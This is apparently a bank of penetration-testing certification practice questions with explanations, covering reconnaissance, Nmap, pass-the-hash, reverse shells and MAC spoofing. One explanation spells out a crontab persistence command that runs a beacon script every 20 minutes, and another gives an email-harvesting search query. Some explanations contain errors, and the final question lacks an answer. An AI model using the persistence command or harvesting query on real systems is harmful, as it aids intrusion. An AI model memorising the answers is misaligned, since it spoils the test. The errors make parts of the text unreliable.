Dion Test Prep

You are working as part of a penetration testing team conducting reconnaissance. Which of the following scan options should you use in Nmap to conduct a faster but still relatively stable scan? -T2 -T4 -T3 -T5

-T4 is the recommended choice for a faster scan that is still relatively stable. -T5 is the fastest scanning option but can be unable if either your network or the target network's speed cannot maintain the timing. -T0 and -T1 are the best options for evading an intrusion detection system, but they are extremely slow to conduct the scan. -T2 slows the scan to conserve bandwidth. -T3 is the default and most stable scanning timing option.

You are working as part of a penetration testing team conducting reconnaissance. Which of the following scan options should you use in Nmap to use the fastest scanning speed, but it may become unstable? A. -T0 B. -T4 C. -T1 D. -T5

-T5 is the fastest scanning option but can be unable if either your network or the target network's speed cannot maintain the timing. -T0 and -T1 are the best options for evading an intrusion detection system, but they are extremely slow to conduct the scan. -T2 slows the scan to conserve bandwidth. -T3 is the default and most stable scanning timing option. -T4 is the recommended choice for a faster scan that is still relatively stable.

You just completed a Nmap scan against a workstation and received the following output: namp diontraining012 Port 135 139 445 Based on these results, which of the following operating system is most likely being run by this workstation? A. Ubuntu B. macOS C. CentOS D. Windows

The workstation is most likely running a version of the Windows operating system. Port 139 and port 445 are associated with the SMB file and printer sharing service run by Windows. Since Windows 2000, the NetBIOS file and print sharing has been running over these ports on all Windows systems by default.

What is not one of the three categories of solutions that all of the pentester's recommended mitigations should fall into? A. Technology B. Process C. People D. Problems

All possible solutions can be categorized as People, Process, or Technology solutions.

What nmap switch would you use to determine which UDP ports are open on a targeted network? A. -sU B. -sP C. -sN D. -sS

In nmap, the -sU flag is used to scan UDP ports. The -sS flag will only scan TCP ports using an SYN scan. The -sP flag is a legacy (and depreciated) command for a ping scan. The -sN flag is used to conduct a TCP NULL scan.

Which of the following vulnerability scans would provide the best results if you want to determine if the target's configuration settings are correct? A. Internal scan B. Credentialed scan C. Non-credentialed scan D. External scan

Credentialed scans log into a system and retrieve their configuration information. Therefore, it should provide you with the best results. A non-credentialed scan relies on external resources for configuration settings that can be altered or incorrect. The scanner's network location does not directly impact the ability to read the configuration information, so it would not make a difference if you conducted an external or internal scan.

During a business trip, Bobby connects to the hotel's wireless network to send emails to some of his clients. The next day, Bobby notices that additional emails have been sent out from his account without consent. Which of the following protocols was MOST likely used to compromise Bobby's email password utilizing a network sniffer? A. HTTP B. TFTP C. SSL D. DNS

HTTP is an unsecured protocol, and information is passed without encryption. If the user signed into their webmail over HTTP instead of HTTPS, a network sniffer could compromise the username and password. Additionally, if the user was using an email client, then the SMTP connection could have been compromised, but since that wasn't an option in this question, we must assume Bobby used a webmail client over HTTP instead.

Your company wants to increase the security of its server room. Which TWO of the following should they install to protect the server room's contents? A. Bollard B. Biometric lock C. Badge reader D. Cable lock E. Strong passwords F. Privacy window shades

A badge reader and biometric lock can be used on a server room door to provide multifactor authentication. Biometrics are identifying features stored as digital data that can be used to authenticate a user. Typical features used include facial pattern, iris, retina, or fingerprint pattern, and signature recognition. This requires a relevant scanning device, such as a fingerprint reader, and a database of biometric information for authentication to occur. A badge reader can be used to read a security badge using RFID, a smart card, or a barcode to authenticate a user. Cable locks are used for laptops, not servers or server rooms. A bollard is used in the parking lot or the front of a building. Strong passwords are used for the servers, not the server room itself. Privacy windows shades could be used, but they are not as strong of a defense as a badge reader and biometric keypad on the door to the server room.

Jason is conducting a physical penetration test against a company. His objective is to enter the server room that is protected by a lock using a fingerprint reader. Jason attempts to use his finger to open the lock several times without success. He then turns his finger 45 degrees to the left, and the lock authenticates him. What is MOST likely the reason the lock opened? A. The crossover error rate is tuned towards false positives B. The crossover error rate is tuned towards true negatives C. The biometric lock is set to fail open after five invalid attempts D. The biometric lock is set to fail closed after five invalid attempts

A biometric lock is difficult to bypass unless the installer incorrectly configures it. If the biometric lock has a high false acceptance rate, it will allow unauthorized people to open the door. The crossover error rate (CER) is the point where the false acceptance and false rejection rates are equal. When charted on a graph, this point can lean more towards accepting false positives or rejecting true positives. If it leans more towards accepting false positives, the sensitivity has decreased to allow less frustration for its users.

You have just conducted an automated vulnerability scan against a static webpage without any user input fields. You have been asked to adjudicate the scanner's findings in the automated report. Which of the following is MOST likely to be a false positive? A. Insecure HTTP methods allowed B. Directory listing enabled C. Command injection allowed D. Reflected XSS

A command injection is unlikely since this is a static webpage and does not accept any user input. A command injection allows the user to supply malicious input to the web server and then passes that data to a system shell for execution. In this sense, command injection does create new instances of execution and can, therefore, leverage languages that the web app does not directly support.

A cybersecurity analyst is reviewing the logs of a Citrix NetScaler Gateway running on a FreeBSD 8.4 server and saw the following output: *IP* -- *DATE* "POST...newbm.pl HTTP/1.1" 200 143 *IP* -- *DATE* "GET...backdoor.xml HTTP/1.1" 200 941 *IP* -- *DATE* "POST...newbm.pl HTTP/1.1" 200 143 What type of attack was most likely being attempted by the attacker? A. XML injection B. Directory traversal C. Password spraying D. SQL injection

A directory traversal attack aims to access files and directories stored outside the webroot folder. By manipulating variables or URLs that reference files with "dot-dot-slash (../)" sequences and its variations or using absolute file paths, it may be possible to access arbitrary files and directories stored on the file system, including application source code or configuration and critical system files. The example output provided comes from a remote code execution vulnerability being exploited in which a directory traversal is used to access the files. XML Injection is an attack technique used to manipulate or compromise an XML application or service's logic. SQL injection is the placement of malicious code in SQL statements via web page input. Password spraying attempts to crack various users' passwords by attempting a compromised password against multiple user accounts.

You are conducting a wireless penetration test against an organization. During your attack, you created an evil twin of their wireless network. Many of the organization's laptops are now connected to your evil twin access point. Which of the following exploits should you utilize next to gather credentials from the victims browsing the internet through your access point? A. Downgrade attack B. Karma attack C. Fragmentation attack D. Deauthentication attack

A downgrade attack forces a client to use a weaker SSL version that the attacker can crack. Since the devices are connected through your access point, you can establish a weaker SSL-based HTTPS connection between their web browser and the actual web server they wanted. This forcing of the client to use a weaker version is known as a downgrade attack, and it allows the attacker to capture the packets and later crack them offline since SSL-based HTTPS is weak enough to crack due to vulnerabilities in its design. A fragmentation attack obtains the pseudorandom generation algorithm (PRGA) of network packets used in WEP. Deauthentication attacks are used in the service of an evil twin, replay, cracking, denial of service, and other attacks. All 802.11 Wi-Fi protocols include a management frame that a client can use to announce that it wishes to terminate a connection with an access point. The victim's device will be kicked off the access point by spoofing the victim's MAC address and sending the deauthentication frame to the access point. A karma attack is a variant of the evil twin attack. A karma attack exploits the behavior of a wireless client trying to connect to its preferred network list. This list contains the SSIDs of access points the device has connected to in the past. When a wireless device is looking to connect to the internet, it firsts beacons to determine if any of these previously connected networks are within range.

You are attempting to exploit a network-based vulnerability against a Windows server. You configure Metasploit with the following options below and enter the run command. set smbpass set payload set lhost set lport run Which of the following types of exploits are you attempting? A. Pass the hash B. Sandbox escape C. Credential harvesting D. Credential brute forcing

A pass the hash attack is a network-based attack where the attacker steals hashed user credentials and uses them as-is to try to authenticate to the same network the hashed credentials originated on. When authenticating with a username and password, the password is hashed once you type it in. Therefore, the computer doesn't recognize a difference between the password and the hash itself. So, if you use psexec to send the hash to the system directly, it can be used to authenticate you as that user without actually knowing the user's password. The key to answering this question is identifying that the smbpass parameter is being set to a password hash of a specified user.

You are working as a penetration tester conducting an engagement against Dion Training's corporate network. The known-environment assessment was designed to take four months of reconnaissance and two weeks of active engagement. The first week is focused on breaching the external perimeter, and the second week is focused on the internal servers. Your team has spent the last 3 months researching ways to exploit and bypass the firewalls and IPS at Dion Training. You just received a call from Dion Training stating that they just replaced their firewalls and IPS appliances with a state-of-the-art UTM. You recommend to the client that if you cannot exploit the UTM within the first 3 days, your team's source IP addresses should be allow listed to focus their time on the internal network. Which of the following BEST describes this scenario? A. Goal reprioritization B. De-confliction C. De-escalation D. Situational awareness

A penetration test is a fluid process based on the people, processes, and technology involved. When the company changed its architecture, it essentially invalidated much of the research your team conducted. The recommendation to allow list the source IP addresses is a goal reprioritization. Without adequate preparation time, it is unlikely you will exploit or bypass the new UTM appliances. Therefore, you suggest that the client reprioritize the engagement to focus on the internal network during this assessment to make the best use of your time and resources.

You are conducting a penetration test and have been asked to simulate an APT. You have established TLS network connections from a victimized host in the organization's intranet to your workstation which you are using to attempt data exfiltration from the server. The TLS connection is occurring from an end user's workstation over an ephemeral port to your workstation's listener setup on port 443. You have placed modified versions of svchost.exe and cmd.exe in the victimized host's %TEMP% folder and set up scheduled tasks to establish a connection from the victimized host to your workstation every morning at 3 am. Which of the following types of post-exploitation techniques is being used? A. Reverse shell B. Trojan C. Daemon D. Bind shell

A reverse shell is established when the target machine communicates with an attack machine that is listening on a specific port. Reverse shells are effective in bypassing firewalls, port filtering, and network address translations, unlike a bind shell. A bind shell allows a target system to bind its shell to a local network port and accept inbound connections. Bind shells may be blocked by a firewall filtering incoming traffic on the given port, though. A trojan is a malicious software program hidden within an innocuous-seeming piece of software. Usually, the Trojan is used to try to compromise the security of the target computer. A daemon is used on Linux systems to act as a service that runs in the background without being attached to a terminal.

Sarah is conducting a penetration test against Dion Training's Linux-based network. This engagement aims to simulate an advanced persistent threat and demonstrate persistence for 30 days without their system administrators identifying the intrusion. Which of the following commands should Sarah use to run a script that beacons back to her computer every 20 minutes? A. schtask/create/tn beacon /tr C:\temp\beacon.bat /sc MONTHL B. (cron tab -I;echo "*/20** C. (cron tab -I;echo "**/20*** D. schtask/create/tn beacon /tr C:temp\beacon.bat /sc MINUTE

A scheduled task or scheduled job is an instance of execution, like initiating a process or running a script, that the system performs on a set schedule. Once the task executes, it can prompt the user for interaction or run silently in the background; it all depends on what the task is set up to do. Scheduled tasks in Linux use the crontab command. The correct answer for this persistence is to enter the command "(crontab -l ; echo "*/20 * * * * /tmp/beacon.sh")| crontab -" that will run the script at "/tmp/beacon.sh every 20 minutes as the SYSTEM level user. The other variant of crontab is incorrect because it would run every 20 hours, not 20 minutes. The schtasks options are used in Windows, not in Linux.

A new piece of malware attempts to exfiltrate user data by hiding the traffic and sending it over a TLS-encrypted outbound traffic over random ports. What technology would be able to detect and block this type of traffic? A. Stateless packet inspection B. Stateful packet inspection C. Application-aware firewall D. Intrusion detection system

A web application firewall (WAF) or application-aware firewall would detect both the accessing of random ports and TLS encryption and identify it as suspicious. An application-aware firewall can make decisions about what applications are allowed or blocked by a firewall, and TLS connections are created and maintained by applications. A stateless packet inspection firewall allows or denies packets into the network based on the source and destination IP address or the traffic type (TCP, UDP, ICMP, etc.). A stateful packet inspection firewall monitors the active sessions and connections on a network. The process of stateful inspection determines which network packets should be allowed through the firewall by utilizing the information it gathered regarding active connections as well as the existing ACL rules. Neither a stateless nor stateful inspection firewall operates at layer 6 or layer 7, so they cannot inspect TLS connections. An intrusion detection system (IDS) is a device or software application that monitors a network or systems for malicious activity or policy violations. An IDS only monitors the traffic on the network, it cannot block traffic.

A penetration tester hired by a bank began searching for the bank's IP ranges by performing lookups on the bank's DNS servers, reading news articles online about the bank, monitoring what times the bank's employees came into and left work, searching job postings (with a special focus on the bank's information technology jobs), and even searching the corporate office of the bank's dumpster. Based on this description, what portion of the penetration test is being conducted? A. Active information gathering B. Information reporting C. Vulnerability assessment D. Passive information gathering

Passive information gathering consists of numerous activities where the penetration tester gathers open-source or publicly available information without the organization under investigation being aware that the information has been accessed. Instead, active information gathering starts to probe the organization using DNS Enumeration, Port Scanning, and OS Fingerprinting techniques. Vulnerability assessments are another form of active information gathering. Information reporting occurs after the penetration test is complete, and it involves writing a final report with the results, vulnerabilities, and lessons learned during the assessment.

Which of the following type of threats did the Stuxnet attack rely on to cross an air gap between a business and an industrial control system network? A. Removable media B. Directory traversal C. Session hijacking D. Cross-site scripting

Air gaps are designed to remove connections between two networks to create a physical segmentation between them. The only way to cross an air gap is to have a physical device between these systems, such as using a removable media device to transfer files between them. A directory traversal is an HTTP attack that allows attackers to access restricted directories and execute commands outside of the web server's root directory. Cross-Site Scripting (XSS) attacks are a type of injection in which malicious scripts are injected into otherwise benign and trusted websites. A session hijacking attack compromises the session token by stealing or predicting a valid session token to gain unauthorized access to the Web Server. A directory traversal, cross-site scripting, or session hijacking attack cannot by itself cross an air gap.

What is a common Service Oriented Architecture Protocol (SOAP) vulnerability? A. XML denial of service B. Xpath injection C. Cross-site scripting D. SQL injection

An XML denial of service (or XML bomb) attempts to pull in entities recursively in a defined DTD and explode the amount of memory used by the system until a denial of service condition occurs. Service-Oriented Architecture (SOA) is an architectural paradigm, and it aims to achieve a loose coupling amongst interacting distributed systems. SOA is used by enterprises to efficiently and cost-effectively integrate heterogeneous systems. However, SOA is affected by several security vulnerabilities, affecting the speed of its deployment in organizations. SOA is most commonly vulnerable to an XML denial of service. While the other options could be used as part of an attack on SOAP, the SOAP message itself is formatted as an XML document making an XML denial of service the most common vulnerability. While SOAP requests are vulnerable to SQL injections, this occurs by submitting a parameter as a morphed SQL query that can authenticate or reveal sensitive information as an attack on the underlying SQL. Cross-Site Scripting (XSS) attacks are a type of injection in which malicious scripts are injected into otherwise benign and trusted websites. XPath Injections operate on websites that use user-supplied information to construct an XPath query for XML data.

You are working as part of a DevSecOps team at Dion Training on a new practice exam Android application. You need to conduct static analysis on the APK (Android PacKage) as part of your software assurance responsibilities. Which actions should you use to convert the APK back into the source code to analyze the type of information an attacker might gain during reverse engineering the APK? A. Compile the APK into a JAR and then convert it into the DEX source code B. Decompile the DEX to a JAR file and then convert the JAR into Java C. Convert the DEX to a JAR file and then decompile the JAR into Java D. Convert the Java code in the APK to a JAR file and then cross-compile it to a DEX

Android apps come packaged as APKs (Android PacKages). The APK contains all the application files, including the DEX file (Android bytecode/binary). To reverse the APK into the source code to conduct a static analysis, you can convert the DEX file to a JAR (Java Archive) file. Then, you can decompile the JAR file into Java source code using a decompiler. While the specifics on how to do all of this are beyond the exam's scope, you should understand the concepts and basic steps involved per the exam objectives.

Dion Training wants to implement technology within their corporate network to BEST mitigate the risk that a zero-day virus might infect their workstations. Which of the following should be implemented FIRST? A. Intrusion detection system B. Host-based firewall C. Anti-malware solution D. Application allow list

Application allow list will only allow a program to execute if it is specifically listed in the approved exception list. All other programs are blocked from running. This makes it the BEST mitigation against a zero-day virus. An intrusion detection system might detect the anomalous activity created by a piece of malware, but it will only log or alert based on the activity, not prevent it. A host-based firewall may prevent a piece of malware from establishing a network connection with a remote server. Still, again, it wouldn't prevent infection or prevent it from executing. An anti-malware solution is a good investment towards improving your security. Since the threat is a zero-day virus, an anti-malware solution will not detect it using its signature database.

You are preparing for the exploitation of Dion Training's systems as part of a penetration test. During your research, you determined that Dion Training is using application containers for each of its websites. You believe that these containers are all hosted on the same physical underlying server. Which of the following components should you attempt to exploit to gain access to all of the websites at once? A. Hypervisor vulnerability B. Common libraries C. Their e-commerce website's web application D. Configuration files

Application containers are virtualized environments designed to package and run a single computing application or service and share the same host kernel. Since they share the same host kernel, they use common libraries, as well. If you can exploit the common libraries, you will gain access to every website on that server, even if they are in an application container. An application container does not use a hypervisor like a typical virtual machine. Configuration files are unique to each application container. The e-commerce website's web application is likely hosted in a single application container and, therefore, would not provide you access to every website simultaneously if exploited.

Which of the following techniques listed below are not appropriate to use during a passive reconnaissance exercise against a specific target company? A. Registrar checks B. BGP looking glass usage C. Banner grabbing D. WHOIS lookups

Banner grabbing requires a connection to the host to grab the banner successfully. This is an active reconnaissance activity. All other options are considered passive processes and typically use information retrieved from third parties that do not directly connect to an organization's remote host.

You are working as part of a penetration testing team conducting reconnaissance. You have received the following frame of a network session sent from your team to an authenticated host on the network: Sender MAC Address: 00:1d:09:f0:92:ab Target MAC Address: 00:1a:6b:6c:0c:cc During your previous reconnaissance that the target network uses layer 2 data to control which devices can gain access to their wireless network. Which of the following network identifiers should you use to effectively spoof your client's address and gain access to the network? A. 10.10.10.1 B. 00:1d:09:f0:92:ab C. 00:1a:6b:6c:0c:cc D. 10.10.10.2

Based on the scenario, you need to identify the right MAC address to use during MAC spoofing to gain access to the wireless network and bypass its MAC filtering. Since the scenario states that your team member sent the frame to an authenticated host, you need to use the target MAC address when spoofing your client onto the network.

You are working as part of a penetration testing team targeting Dion Training's website. Which of the following tools should you use to attempt an XSS or injection attack against their website? A. BeEF B. Nikto C. Androzer D. Netcat

BeEF (Browser Exploitation Framework) is a penetration testing tool included with Kali Linux that focuses on web browsers. BeEF can be used for XSS and injection attacks against a website. Netcat is an open-source networking utility for debugging and investigating the network, and that can be used to create TCP/UDP connections and investigate them. Nikto is an open-source web server scanner that searches for potentially harmful files, checks for outdated web server software, and looks for problems with some web server software versions. Androzer is a security testing framework for Android apps and devices.

What is the term for exploiting a weakness in a user's wireless headset to compromise their smartphone? A. Bluejacking B. Zero-day attack C. Multiplexing D. Smurfing

Bluejacking is the sending of unsolicited messages over Bluetooth to Bluetooth-enabled devices such as mobile phones, PDAs, or laptop computers, sending a vCard which typically contains a message in the name field to another Bluetooth-enabled device via the OBEX protocol. A zero-day attack happens once that flaw, or software/hardware vulnerability, is exploited and attackers release malware before a developer has an opportunity to create a patch to fix the vulnerability. The Smurf attack is a distributed denial-of-service attack in which large numbers of Internet Control Message Protocol packets with the intended victim's spoofed source IP are broadcast to a computer network using an IP broadcast address. Multiplexing is a method by which multiple analog or digital signals are combined into one signal over a shared medium to share a scarce resource. Multiplexing is not a type of exploit or attack but is heavily used to increase the bandwidth of wireless networks and fiber optic connections.

Which type of method is used to collect information during the passive reconnaissance? A. Social engineering B. Network traffic sniffing C. Reviewing public repositories D. API requests and responses

Passive reconnaissance focuses on collecting information that is widely and openly available from publicly available sources. While network traffic sniffing is considered passive, gaining access to the network to place a sniffer in a good network tap location would not be considered passive. Of the choices provided, publicly accessible sources are the best answer to choose. Collecting API requests and responses would involve a penetration tester sending data to a given server and analyzing the responses received, which is considered an active reconnaissance method. Social engineering is also an active reconnaissance technique that uses deception to trick a user into providing information to an attacker or penetration tester.

Dion Consulting Group has just won a contract to provide updates to an employee payroll system originally written years ago in C++. During your assessment of the source code, you notice the command "strcpy" is being used in the application. Which of the following provides is cause for concern, and what mitigation would you recommend to overcome it? A. strcpy could allow an interger overflow to occur; upgrade the operating system to run ASLR to prevent a buffer overflow B. strcpy could allow a buffer overflow to occur. upgrade the operating system to run ASLR to prevent a buffer overflow C. strcpy could allow an interger overflow to occur; you should rewrite the entire system in Java strcpy could allow a buffer overflow to occur; you should rewrite the entire system in JAVA

C and C++ contain built-in functions such as strcpy that do not provide a default mechanism for checking if data will overwrite the boundaries of a buffer. The developer must identify such insecure functions and ensure that every call made to them by the program is performed securely. Many development projects use higher-level languages, such as Java, Python, and PHP. These interpreted languages will halt execution if an overflow condition is detected. However, changing languages may be infeasible in an environment that relies heavily on legacy code. By ensuring that the operating system supports ASLR, you can make it impossible for a buffer overflow to work by randomizing where objects in memory are being loaded. Rewriting the source code would be highly desirable but could be costly, time-consuming, and would not be an immediate mitigation to this problem. The strcpy function (which is short for String copy) does not work on integers, and it only works on strings. As strcpy does not check for boundary conditions, buffer overflows are certainly possible using this deprecated method.

Dion Training wants to increase the speed of response from its secure web servers when users attempt to connect to it. The company wants to enable a feature that will allow the webserver to host its SSL/TLS certificate status itself and have it time-stamped periodically by the issuing CA. This method would allow the student's web browser to only connect to the website instead of creating an individual certificate status query to the CA each time they try to connect to the site. Which of the following PKI solutions should Dion Training implement to achieve this? A. Online certificate status protocol B. Certificate pinning C. Certificate stapling D. Certificate revocation list

Certificate stapling allows a webserver to perform certificate status checking instead of having the browser perform the checking. The web server checks the status of a certificate and provides the browser with the digitally signed response from the OCSP responder. Certificate stapling is much faster than using individual queries to the CA using OCSP. The online certificate status protocol (OSCP) allows clients to request the status of a digital certificate and to check whether it is revoked. A certificate revocation list (CRL) is a list of every digital certificate that has been revoked before its expiration date. Certificate pinning is a deprecated method of trusting digital certificates that bypasses the CA hierarchy and chain of trust to minimize on-path (formerly man-in-the-middle) attacks.

Which of the following tools should a penetration tester use to conduct post-exploitation identification of vulnerabilities in a Windows Active Directory environment? A. CrackMapExec B. CeWL C. Wapiti D. Brakeman

CrackMapExec is a post-exploitation tool to identify vulnerabilities in active directory environments. Brakeman is a static code analysis security tool for Ruby on Rails applications that checks for vulnerabilities and provides a confidence level for the findings as high, medium, or weak. CeWL is a word list generate that automatically navigates a website and collects words from the text, metadata, and other files found on the site. The Wapiti is a web application vulnerability scanner that automatically navigates a web app to find areas where it can inject data.

A cybersecurity analyst is attempting to perform an active reconnaissance technique to audit their company's security controls. Which DNS assessment technique would be classified as active? A. A Zone transfer B. Using Maltego C. A whois query D. A DNS forward or reverse lookup

DNS zone transfer, also sometimes known by the inducing DNS query type AXFR, is a DNS transaction type. It is one of the many mechanisms available for administrators to replicate DNS databases across a set of DNS servers. DNS zone transfers are an active technique. Performing a whois query is a passive reconnaissance technique that performs a query of the databases that store the registered users or assignees of an Internet resource, such as a domain name, an IP address block, or an autonomous system, but is also used for a wider range of other information. Performing DNS forward and reverse lookups is an active technique that allows the resolution of names to IP addresses and IP addresses to names. This can be conducted as a passive technique. Maltego is used for open-source intelligence and forensics. It focuses on providing a library for data discovery from open sources and visualizing that information in a graph format suitable for link analysis and data mining. It collects this information passively since it can acquire the information from whois lookup servers, a DNS lookup tool using public DNS servers, or even emails and hostnames one can acquire from theHarvester.

DeepScan supports data-flow analysis and understands the execution flow of a program. It allows you to see possible security flaws without executing the code. Which of the following types of tools would DeepScan be classified as? A. Decompiler B. Fault injector C. Fuzzer D. Static code analyzer

DeepScan is an example of a static code analysis tool. It inspects the code for possible errors and issues without actually running the code. Fuzzing is an automated software testing technique that involves providing invalid, unexpected, or random data as inputs to a computer program through a fuzzer. A decompiler is a computer program that takes an executable file as input and attempts to create a high-level source file that can be recompiled successfully. Fault injection is a testing technique that aids in understanding how a system behaves when stressed in unusual ways. A fuzzer, decompiler, and fault injector are all dynamic analysis tools because they require the program to be run during testing and analysis.

Evaluate the following log entry: Date 1x1 Kernel: iptables INPUT drop IN=eth0 OUT= DPT=23 Based on this log entry, which of the following statements are true? A. The packet was blocked inbound to the network B. The packet was blocked outbound from the network C. An attempted connection to the telnet service was prevented D. An attempted connection to the ssh service was prevented MAC filtering is enabled on the firewall E. Packets are being blocked inbound to and outbound from the network

Firewall log formats will vary by vendors, but this example is a commonly used format from the Linux iptable firewall tool. This log starts with the date and time of the event and provides some key pieces of information. For example, the word "drop" shows the action this log entry recorded. In this case, the firewall dropped a packet due to an ACL rule being applied. You can also see that the packet was detected on the inbound connection over eth0, so we know that packets are being scanned and blocked when they are headed inbound to the network. Next, we see the MAC address of the source device of the packet, the source (SRC) IP address, and the destination (DST) IP address. Further down, we see the source (SPT) and destination ports (DPT). In this case, the DPT is 23 and is a well-known port for telnet. Based on this single log entry, we cannot tell if packets are also being blocked when they are attempting to leave the network or if they are blocking connections to the ssh service (port 22) is also being conducting.

A malicious user is blocking cellular devices from connecting to the Internet whenever they enter the coffee shop. If they get their coffee to go and walk at least a block away from the coffee shop, their smartphones will connect to the Internet again. What type of network attack is the malicious user performing? A. On-path attack B. Frequency jamming C. Spoofing D. Blocklisting IP addresses in the ACL

Frequency jamming is one of the many exploits used to compromise a wireless environment. Frequency jamming is the disruption of radio signals through the use of an over-powered signal in the same frequency range. It works by denying service to authorized users as legitimate traffic is jammed by the overwhelming frequencies of illegitimate traffic. There is no indication that the malicious user has created a rogue AP (which is a form of spoofing) or performing an on-path attack by having users connect through their laptop or device within this scenario. Also, there is no mention of certain websites or devices being blocked logically using a blocklist or ACL.

A coworker is conducting open-source intelligence gathering for an upcoming penetration test against Dion Training. You look over their shoulder and see them enter the following URL, https://www.google.com/search?q=*%40diontraining.com. Which of the following is true about the results of this search? A. Returns all web pages hosted at diontraining.com B. Returns no useful results for an attacker C. Returns all web pages containing the text diontraining.com D. Returns all web pages containing an email address affiliated with diontraining.com

Google interprets this statement as <anything>@diontraining.com and understands that the user is searching for email addresses since %40 is the hex code for the @ symbol. The * is a wild card character meaning that any text could be substituted for the * in the query. This type of search would provide an attacker with a list of email addresses associated with diontraining.com, which could be used as part of a spear phishing campaign. To return all web pages hosted at diontraining.com, you should use the "site:" modifier in the query. To return all web pages with the text diontraining.com, enter "diontraining.com" into the Google search bar with no modifiers to return those results.

Which of the following tools should a penetration tester use to conduct password cracking of multiple network authentication types simultaneously? A. w3af B. Gobuster C. Mimikatz D. Hydra

Hydra is a password cracking tool that supports parallel testing of several network authentication types simultaneously. Mimikatz is a tool that gathers credentials by extracting key elements from memory such as cleartext passwords, hashes, and PIN codes. Gobuster is a tool that can discover subdomains, directories, and files by brute-forcing from a list of common names. The Web Application Attack and Audit Framework (w3af) allows you to identify and exploit a large set of web-based vulnerabilities, such as SQL injection and cross-site scripting.

Cybersecurity analysts are experiencing some issues with their vulnerability scans aborting because the previous day's scans are still running when the scanner attempts to start the current day's scans. Which of the following recommendations is LEAST likely to resolve this issue? A. Add another vulnerability scanner B. Reduce the sensitivity of scans C. Reduce the scope of scans D. Reduce the frequency of scans

If the cybersecurity analyst were to reduce the scans' sensitivity, it still would not decrease the time spent scanning the network and could alter the effectiveness of the results received. In this scenario, the scans, as currently scoped, are taking more than 24 hours to complete with the current resources. The analyst could reduce the scans' scope, thereby scanning fewer systems or vulnerabilities signatures and taking less time to complete. Alternatively, the analyst could reduce the scans' frequency by moving to a less frequent schedule, such as one scan every 48 hours or one scan per week. The final option would be to add additional vulnerability scanners to the process. This would allow the two scanners to work together to divide the workload and complete the task within the 24-hour scan frequency currently provided.

Consider the following data structure: { "id" : "Bundle--" } Which of the following best describes the data structure presented above? A. JSON B. Array C. Key-value pair D. CSV

JSON is an open standard data encoding format of data representation that can be used and manipulated easily with scripts. It is designed to be human-readable and machine-processable. It is based on JavaScript concepts but is entirely script and language-independent. This excerpt is a JSON object used by the STIX protocol to convey threat information. STIX (Structured Threat Information eXpression) is a standardized XML programming language for conveying data about cybersecurity threats in a common language that can be easily understood by humans and security technologies. A comma-separated value (CSV) file is a file where entries are separated by commas. CSV files were originally used as an export from spreadsheets but have since become a very popular way to import and export data. A key-value pair is made of a key name and a value of that key separated by a colon(:), such as type:intrusion-set. An array is a data structure consisting of a collection of elements, each identified by at least one array index or key. In the JSON data structure shown, there are multiple arrays and key-value pairs included, but the overall data structure is JSON formatted making it the better answer.

Tim is working to prevent any remote login attacks to the root account of a Linux system. What method would be the best option to stop attacks like this while still allowing normal users to connect using ssh? A. Add an iptables rule blocking root logins B. Add root to the sudoers group C. Add a network IPS rule to block root logins D. Change sshd_config to deny root login

Linux systems use the sshd (SSH daemon) to provide ssh connectivity. If Tim changes the sshd_config to deny root logins, it will still allow any authenticated non-root user to connect over ssh. The sshd service has a configuration setting that is named PermitRootLogin. If you set this configuration setting to no or deny, all root logins will be denied by the ssh daemon. If you didn't know about this setting, you could still answer this question by using the process of elimination. An iptables rule is a Linux firewall rule, and this would block the port for ssh, not the root login. Adding root to the sudoers group won't help either since the sudoers group allows users to login as root. If you have a network IPS rule to block root logins, the IPS would have to see the traffic being sent within the SSH tunnel. This is not possible since SSH connections are encrypted end-to-end by default. Therefore, the only possible right answer is to change the sshd_config setting to deny root logins.

As part of the reconnaissance stage of a penetration test, Kumar wants to retrieve information about an organization's network infrastructure without causing an IPS alert. Which of the following is his best course of action? A. Perform a DNS zone transfer B. Use a nmap ping sweep C. Perform a DNS brute-force attack D. Use a nmap stealth scan

The best course of action is to perform a DNS brute-force attack. The DNS brute-force attack queries a list of IPs and typically bypasses IDS/IPS systems that do not alert on DNS queries. A ping sweep or a stealth scan can be easily detected by the IPS, depending on the signatures and settings being used. A DNS zone transfer is also something that often has a signature search for it and will be alerted upon since it is a common attack technique.

A penetration tester was able to gain access to your organization's network closet while posing as an HVAC technician. While he was there, he installed a network sniffer in your switched network environment. The penetration tester now wants to sniff all of the packets in the network. What attack should he use? A. MAC Flood B. Smurf C. Tear Drop D. Fraggle

MAC flooding is a technique employed to compromise the security of switched network devices. The attack forces legitimate MAC addresses out of the CAM table in the switch and forces a unicast flooding behavior, potentially sending sensitive information to portions of the network where it is not normally intended to go. Essentially, since the switch table of contents is flooding with bad information, the switch could fail open and begin to act like a hub, broadcasting all the frames out of every port. This would allow the attacker to sniff all network packets since he is connected to one of those switch ports. A fraggle attack is a denial-of-service (DoS) attack that involves sending a large amount of spoofed UDP traffic to a router's broadcast address within a network. A teardrop attack is a denial-of-service (DoS) attack that involves sending fragmented TCP packets to a target machine. The Smurf attack is a distributed denial-of-service attack. Large numbers of Internet Control Message Protocol (ICMP) packets with the intended victim's spoofed source IP are broadcast to a computer network using an IP broadcast address.

During the reconnaissance phase of a penetration test, you have determined that your client uses several networked devices that rely on an embedded operating system. Which of the following methods would MOST likely be the best method for exploiting these? A. Identify a jailbroken device for easy exploitation B. Use web-based exploits against the devices web interfaces C. Use a spearphishing campaign to trick a user into installing a RAT D. Use social engineering to trick a user into opening a malicious APK

Most embedded operating systems use a web interface to access their configurations for setup and installation. Focusing on this web interface and using common web-based exploits is usually one of the best methods of exploiting a device with an embedded OS. Jailbroken devices refer to iPhones and iPads that have been configured to give the user root access to the underlying operating system. Spearphishing campaigns are not usually used against an embedded operating system since many of these devices are not used directly by an end-user. A malicious APK would be used to target an Android-based operating system and most embedded operating systems are based on Linux and not Android.

During her login session, Sally is asked by the system for a code sent to her via text (SMS) message. Which of the following concerns should she raise to her organization's AAA services manager? A. SMS should be paired with a third factor B. SMS is a costly method of providing a second factor of authentication C. SMS messages may be accessible to attackers via VoIP or other systems D. SMS should be encrypted to be secure

NIST's SP 800-63-3 recommends that SMS messages be deprecated as a means of delivering a second factor for multifactor authentication because they may be accessible to attackers. SMS is unable to be encrypted (at least without adding additional applications to phones). A third factor is typically not a user-friendly recommendation and would be better handled by replacing SMS with the proposed third factor. SMS is not a costly method since it can be deployed for less than $20/month at scale.

You are currently conducting passive reconnaissance in preparation for an upcoming penetration test against Dion Training. You are reviewing the DNS records for the company and are trying to identify which server is their authoritative DNS server to plan an attack against it. Which of the following DNS records should you analyze? A. NS B. SRV C. TXT D. MX

